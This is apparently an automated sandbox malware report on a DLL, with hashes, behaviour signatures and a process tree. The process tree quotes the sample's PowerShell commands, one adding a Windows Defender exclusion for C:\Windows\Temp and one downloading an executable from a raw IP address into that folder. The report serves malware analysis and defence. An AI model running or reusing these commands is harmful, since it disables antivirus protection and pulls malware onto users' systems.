Analysis

  • max time kernel
    15s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-12-2024 04:44

General

  • Target

    aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564.dll

  • Size

    6KB

  • MD5

    e017be56699801dc89a8d6d1724eb633

  • SHA1

    a7f7aae4744210db8ebaf4da06c167357bc71eca

  • SHA256

    aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564

  • SHA512

    2368425dadc7f22eb11532359d4d1aa97bf3e381f4fd7b62c587e1f8819ef64a0ff7fc75cc5948939fadebc423345ab65a1cd2799bb4136fbea89d1f75dfc8c8

  • SSDEEP

    96:fNnyOybUJQ23GgX791qKilsZODTgFZP/8R:fNnyOybrVO9QKilhfgFZP/u

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:880
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564.dll
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\redj5i0w.wuj.exe'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 808
        3⤵
        • Program crash
        PID:2576

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    0c9eda3c1ca15eb54856a4a2a6f486bd

    SHA1

    2e1de7b169a798f3f58bc14fd4de9bb519688c8c

    SHA256

    740d88c4f02846be1cc14538cf6c65d3bf0e88ebe34f79195c481ece030f8cd7

    SHA512

    0148f8fee649d1b8aace2602c2ed06b8d87df8a8aefcc82791248a7d974351340565d93a27c9cbd47fa469da5c40d640b195469b7fe6174713cdf18514ba018c

  • memory/2236-0-0x00000000003F0000-0x00000000003FA000-memory.dmp

    Filesize

    40KB

  • memory/2236-1-0x0000000074D10000-0x0000000074D1A000-memory.dmp

    Filesize

    40KB